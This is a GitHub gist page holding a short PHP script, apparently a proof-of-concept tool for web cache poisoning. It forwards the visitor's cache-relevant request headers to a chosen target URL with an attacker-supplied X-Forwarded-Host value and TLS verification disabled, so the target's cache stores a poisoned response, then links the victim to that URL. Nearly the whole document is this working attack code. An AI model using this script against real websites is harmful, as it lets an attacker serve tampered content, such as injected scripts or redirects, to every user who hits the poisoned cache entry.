Skip to content

Instantly share code, notes, and snippets.

@BlackFan

BlackFan/webcachepoisoning.php

Last active August 19, 2020 09:09
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save BlackFan/5e049a66e97c12a1a6fcfad0d4cbba08 to your computer and use it in GitHub Desktop.
Save BlackFan/5e049a66e97c12a1a6fcfad0d4cbba08 to your computer and use it in GitHub Desktop.
Download ZIP
webcachepoisoning.php
Raw
webcachepoisoning.php
<?php
$attack_url = $_GET['url'];
$payload = $_GET['payload'];
$ch = curl_init();
if(isset($_SERVER['HTTP_ACCEPT'])) {
$headers[] = 'Accept: '.$_SERVER['HTTP_ACCEPT'];
}
if(isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
$headers[] = 'Accept-Language: '.$_SERVER['HTTP_ACCEPT_LANGUAGE'];
}
if(isset($_SERVER['HTTP_ACCEPT_ENCODING'])) {
$headers[] = 'Accept-Encoding: '.$_SERVER['HTTP_ACCEPT_ENCODING'];
}
if(isset($_SERVER['HTTP_USER_AGENT'])) {
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
}
$headers[] = 'X-Forwarded-Host: '.$payload;
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLINFO_HEADER_OUT, TRUE);
curl_setopt($ch, CURLOPT_PATH_AS_IS, TRUE);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_exec($ch);
curl_close($ch);
?>
<body>
<div>Open URL <a target="_blank" href="<?php echo htmlspecialchars($attack_url); ?>"><?php echo htmlspecialchars($attack_url); ?></a></div>
</body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment